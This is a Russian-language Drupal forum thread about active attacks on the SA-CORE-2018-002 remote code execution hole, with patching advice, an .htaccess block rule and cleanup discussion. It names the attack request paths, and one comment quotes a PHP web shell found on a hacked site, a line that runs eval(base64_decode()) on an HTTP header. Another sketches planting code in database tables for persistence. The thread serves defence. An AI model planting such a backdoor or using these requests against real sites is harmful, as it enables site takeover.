Хакеры начали использовать уязвимость ядра Drupal SA-CORE-2018-002 для атак на сайты

Аватар пользователя SkyD
2

Коллеги, минуту внимания!

CheckPoint опубликовали способ эксплуатации SA-CORE-2018-002 / CVE-2018-7600: https://research.checkpoint.com/uncovering-drupalgeddon-2/

Боты уже начали атаковать сайты на Друпале:

  1. GET-запрос проверяет возможность атаки;
  2. POST - атака с пэйлоадом;
  3. третий POST - проверка загрузки пэйлоада.

 SA-CORE-2018-002 exploit

Пэйлоады пока не отличаются разнообразием:

 GET / POST

На данный момент стоит обратить внимание на запросы вида:

account/mail/%23value (account/mail/#value)
timezone/timezone/%23value (timezone/timezonel/#value)

В качестве временного (!) решения можно добавить в .htaccess вот такие строки, но дальше наверняка появятся новые способы атаки:

RewriteEngine On
RewriteCond %{QUERY_STRING} account/mail/%23value [NC,OR]
RewriteCond %{QUERY_STRING} account/mail/#value [NC,OR]
RewriteCond %{QUERY_STRING} timezone/timezone/%23value [NC,OR]
RewriteCond %{QUERY_STRING} timezone/timezone/#value [NC]
RewriteRule .* - [L]

Более радикальный метод - временная замена сайта на статическую страницу(-ы).

Уязвимости подвержены сайты на Друпал 6, 7, 8. Оценка риска для неё: 24/25 (Highly Critical).

Так что обновляйтесь и чем оперативнее, тем лучше. Уже вышел даже патч для Drupal 6: https://www.drupal.org/project/d6lts/issues/2955130

Тип материала:

Комментарии

Аватар пользователя loup54
loup54 8 месяцев назад

Это для 6-го?

Аватар пользователя Andruxa
Andruxa 8 месяцев назад

а что, в D6 какой-то другой апач?

Аватар пользователя loup54
loup54 8 месяцев назад

а причем тут апач?

Аватар пользователя Semantics
Semantics 8 месяцев назад

Притом, что быстрофикс для .htaccess

Аватар пользователя loup54
loup54 8 месяцев назад

Вопрос относился к содержанию данного поста для каких версий друпала актуальна данная угроза

Аватар пользователя SkyD
SkyD 8 месяцев назад
loup54 написал:
Это для 6-го?

Уязвимости подвержены версии 6, 7 и 8.

Мне изначально это показалось очевидным, ввиду упоминания 6-ки со словом "даже", но теперь уточнил версии и степень критичности в исходном сообщении.

Аватар пользователя gun_dose
gun_dose 8 месяцев назад

Так эту уязвимость пофиксили недавно

Аватар пользователя Arturus
Arturus 8 месяцев назад

Пофиксили последним обновлением? Для всех версий 6,7,8?

Аватар пользователя loup54
loup54 8 месяцев назад
Semantics написал:
Притом, что быстрофикс для .htaccess

и все равно не понял причем тут апач, вы же с помощью его файла защищаете сайт на друпал, а сам апач то тут причем?

Аватар пользователя Semantics
Semantics 8 месяцев назад
1

Притом, что .htaccess исполняется только апачем.
Куча народу сидит без оного, на ином стеке ПО.

Фикс можно применить хоть для сайта на Joomla, защищать им друпал или не защищать - дело десятое

Аватар пользователя ttenz
ttenz 8 месяцев назад

Пофиксили то, пофиксили, но поздновато, эта уязвимость уже в среду была известна. Всё серьёзно(.

Аватар пользователя Semantics
Semantics 8 месяцев назад
2

Уязвимость была анонсирована 21 марта, на уровне "Через неделю обновляйтесь, глупцы".
28 марта вышли апдейты и патчи.

Сегодня - 14 апреля.

Аватар пользователя ttenz
ttenz 8 месяцев назад

Действительно, видимо с эксплойтом перепутал.

Аватар пользователя Arturus
Arturus 8 месяцев назад

Для 6 вижу патч D6LTS patch for SA-CORE-2018-002
А для 7 исправлено в 7.58?

Аватар пользователя loup54
loup54 8 месяцев назад

Выдохнул, у меня все свежее, как неделю уже

Аватар пользователя void
void 8 месяцев назад

Не подскажите есть ли где скачать последнюю версию d6 вместе с этим (примененным) патчем?

Аватар пользователя bsyomov
bsyomov 8 месяцев назад
1

Drupal 6 уже не поддерживается, а расширенная поддержка оказывается платно сторонними организациями, так что не участвуя в этой программе, вероятно, нигде...
Подробнее тут: https://www.drupal.org/project/d6lts
Патчи публичны, но применять придётся самостоятельно.

P.S. Чаще всего, миграция с 6 на 7, не такая уж сложная задача. И очень стоит задуматься о ней...

Аватар пользователя void
void 8 месяцев назад

Всегда есть такие люди, которым миграция на 7-8 кажется оченьдорого и "да и так все норм работает". А с другой стороны хочется помочь, т.к. у них действительно каждая копейка на счету.

Аватар пользователя Semantics
Semantics 8 месяцев назад

Нигде, разве что возможно, pressflow качать, там патч бекпортировали ещё 28 марта

Аватар пользователя Arturus
Arturus 8 месяцев назад

Void, в D6LTS patch for SA-CORE-2018-002 вносятся изменения только в bootstrap.inc, ничего сложного

Аватар пользователя bsyomov
bsyomov 8 месяцев назад

Да, и накладывание патча полезно освоить, тем более, что это довольно не сложный процесс.

Аватар пользователя void
void 8 месяцев назад
1

В этом и проблема, я чего-то делаю не так и нифига не патчится. Мне друпал-кликеру видимо не осилить эти ваши джедайские умения.

Аватар пользователя Arturus
Arturus 8 месяцев назад

А что делаете по шагам?
Просто в этом патче настолько просто, что очень сложно что-то сделать не так.

Аватар пользователя void
void 8 месяцев назад

Да разные инструкции пробовал. Я window-од, поэтому наверное все сложнее. Последнее, что пробовал, это http://xandeadx.ru/blog/drupal/373, но видимо что-то где-то криво у меня стоит в винде или с руками.

Аватар пользователя ttenz
ttenz 8 месяцев назад
1

можно и вручную, что минус удалить, что плюс добавить.

Аватар пользователя gun_dose
gun_dose 8 месяцев назад
1

Если всё так сложно, внесите нужные строки руками.

Аватар пользователя Arturus
Arturus 8 месяцев назад
1

Откройте файл bootstrap.inc в текстовом редакторе и добавьте нужные строки из патча и все, никаких танцев с бубном не нужно. Только изначальный файл сохраните. Или свой файл выкладывайте сюда, поможем.

Аватар пользователя Arturus
Arturus 8 месяцев назад

Да, похоже, что все правильно

Аватар пользователя void
void 8 месяцев назад

Скажите пожалуйста эта уязвимость влияет на все сайты или только на те, где включена регистрация? (смотрю на картинку в посте, а там адрес на форму регистрации - т.е. через нее ломают?)

Аватар пользователя Semantics
Semantics 8 месяцев назад

На все на друпале, иных гарантий нет.
Это эксплоит на форму регистрации.

Аватар пользователя void
void 8 месяцев назад

А если регистрация отключена на сайте, то к ней же нет по идее доступа (пишет доступ запрещен) и ломать не получится? или я чего-то не понимаю?

Аватар пользователя Semantics
Semantics 8 месяцев назад
1

я бы согласился, но прикол с таймзоной я тоже не понял, а она тоже должна быть закрыта.
Но честно, гораздо проще и быстрее накатить патч, чем:
а. Обсуждать
б. Лечить последствия

Аватар пользователя void
void 8 месяцев назад

Ну ясен пень что лучше обновить. Просто интересуюсь.
Еще вот а если регистрация закрыта капчей, то не подобрав ее они ведь до формы не доберутся?

Аватар пользователя Semantics
Semantics 8 месяцев назад
1

Тут не происходит никакого подбора.
Тут сразу в форму подставляют некой деструктивный код

Аватар пользователя Semantics
Semantics 8 месяцев назад
1

Так что, про уязвимость всё равно не всем понятно?
Писать статью?

Аватар пользователя void
void 8 месяцев назад
2

Статьи с заголовком "Алярм! Всем реще обновится до последних версий!!!" точно не хватало. (именно с таким заголовком, а не "SA-CORE-2... четатам")
:)

Аватар пользователя Phantom63rus
Phantom63rus 8 месяцев назад

Плюс рассылка по почте, и сабж пожоще: "АХТУНГ! ВАС ПРОДЕРУТ!".

Аватар пользователя Emes
Emes 8 месяцев назад

Обновился слишком поздно, когда начали уже атаковать. В логах видно, что попытки были. Есть вероятность, что сайт хакнут. Возможно ли как-то обнаружить атаку и нейтрализовать её?

Аватар пользователя Semantics
Semantics 8 месяцев назад
2

Нет гарантий, что нигде не закрепились.
Можно и файлик создать, а могли и в базу прописаться, от заведения нового юзера, до какого-нить бекдора в полях где доступен php-код

Аватар пользователя Andruxa
Andruxa 8 месяцев назад

Обновляю один сайт, там совсем недавно появился файл libasset.php с содержимым:
<?php if(@isset($_SERVER[HTTP_2F4B2])){@eval(base64_decode($_SERVER[HTTP_2F4B2]));}exit; ?>
Попробуйте поискать у себя по вхождению base64_decode, HTTP_2F4B2 и т.п.

Аватар пользователя bsyomov
bsyomov 8 месяцев назад

Это не более чем частный случай, а не что-то характерное для этой конкретной уязвимости...

Аватар пользователя ihtiandr
ihtiandr 8 месяцев назад

У меня вчера к вечеру весь набор на куче сайтов обнаружился. И чужие файлы-папки, и левые пользователи, и левые роли. И ограничения меня в правах. Все стер, восстанавливаю из копии уже 2-е сутки.

Аватар пользователя Emes
Emes 8 месяцев назад

Проверил всех пользователей за последние дни, нашёл только одного подозрительного, роль обычная. Никаких лишних файлов в системе не нашёл, папок тоже. Администратор не тронут. Блоков новых нет, php код обычным юзерам, естественно, недоступен. Значит ли это, что пронесло? Знаю, что нельзя говорить утвердительно, но что могло остановить, учитывая что сайт был уязвим и атака осуществлялась? Я в хакинге понимаю мало, но могла ли рекаптча остановить? Глупо, конечно, но повторюсь: в первый раз за 10 лет с таким сталкиваюсь.

Аватар пользователя Semantics
Semantics 8 месяцев назад

Доступность или недоступность php-фильтра юзерам в контексте данной уязвимости вообще ничего не решает.
Считайте, что у потенциального злоумышленника есть права на всё, и на админку, и на базу, и на загрузку файлов.

Аватар пользователя Emes
Emes 8 месяцев назад

Правильно ли я понимаю, что для того, чтобы эти права были должен быть создан юзер, роль, файл на сервере. Без этого, учитывая что уязвимость закрыта, прав у злоумышленника нет?

Аватар пользователя Semantics
Semantics 8 месяцев назад
1

Вы прям какие-то оправдания ищите.

Простой пример, вы - жертва, я - хакер.

Я атакую ваш сайт, записываю в таблицу menu_router, blocks, в панельки или вьюсы, мест куча, что-то вроде:

  insertion($_REQUEST); //чутка изменил имя функции
  $a($b);

Всё, у меня есть полный доступ с правами веб-сервера, зануды могут поправить, но разница не принципиальна.
Вы и знать об этом не будете.
И после этого, хоть закрывайте уязвимость, хоть не закрывайте, вы уже под моим контролем

Создание файла, юзера, роли, включение и выключение модулей - это всё только пути, а не обязательные условия.

Аватар пользователя gun_dose
gun_dose 8 месяцев назад
2

Ещё одна причина использовать гит - все лишние файлы, как на ладони))

Аватар пользователя vert4
vert4 7 месяцев назад

Простите мою не осведомленность. А что делает данный вирус? Я так понял, что открывает доступ к сайту, к серверу (?) Волнует вопрос именно к серверу добирается? К root правам? Или только по папке с сайтом ходит и по базе. Словил вчерась его вот теперь думаю что чистить ) Только сайт или весь сервак.

Аватар пользователя itcrowd72
itcrowd72 7 месяцев назад

У правильно настроенного сервера root получить невозможно. Если у вас, конечно, веб-сервер не от рута работает :)

Аватар пользователя vert4
vert4 7 месяцев назад

да вопрос был не в этом (сервер не из под рута работает) получает ли бот возможность доступа к серверу к другим папкам не только к папке сайта, который взломан. К другим базам... Да и в базу как он попадает ,если попадает. Одного settings не достаточно. Хочу понять объем чистки на сервере))

Аватар пользователя Semantics
Semantics 7 месяцев назад
1

Всё зависит от того как у вас настроены права.
В стародавние времена, на школохостингах очень был популярен взлом через соседей.
Просто потому везде 777 стояли или одинаковый владелец на все сайты.

С базами аналогично, если у вас друпал работает от рута с полными правами, то я могу дальше не писать.

Аватар пользователя itcrowd72
itcrowd72 7 месяцев назад

А как по вашему злоумышленник может завладеть сервером? Думаю, вам нужно основы GNU/Linux изучить, чтобы подобные вопросы не возникали

Аватар пользователя bsyomov
bsyomov 7 месяцев назад

Вообще, уязвимостей, которые позволяют локально поднять права, не так и мало, и не так уж редко находятся новые. И если долго не обновлять серверное ПО, то можно получить и эскалацию, и сервер под полный контроль.
Т.е. не настолько всё радужно, хотя, чаще, от кривых рук настраивающих больше вреда. =)

К тому же, от пользователя из под которого запускаются скрипты тоже многое можно сделать - например организовать узел сети рассылки спама, или ботнета. Для этого совсем не обязательно иметь доступ под рутом...

Аватар пользователя bsyomov
bsyomov 7 месяцев назад
1

Это не какой-то определённый вирус, а дыра позволяющая удалённое выполнение кода. Что будет при этом сделано, зависит от навыков и фантазии атакующего, или того, кто пишет бота для автоматической атаки.

Аватар пользователя Phantom63rus
Phantom63rus 7 месяцев назад

Ваш сайт ломают не из-за вашего сайта, а из-за серверных мощностей. Дальше ддос, спам, майнинг... собственно говоря, неработающий сайт это в большинстве случаев последствия попытки включения сервера в несколько различных ботнетов. Конфликт вирусов, как бы странно это ни звучало.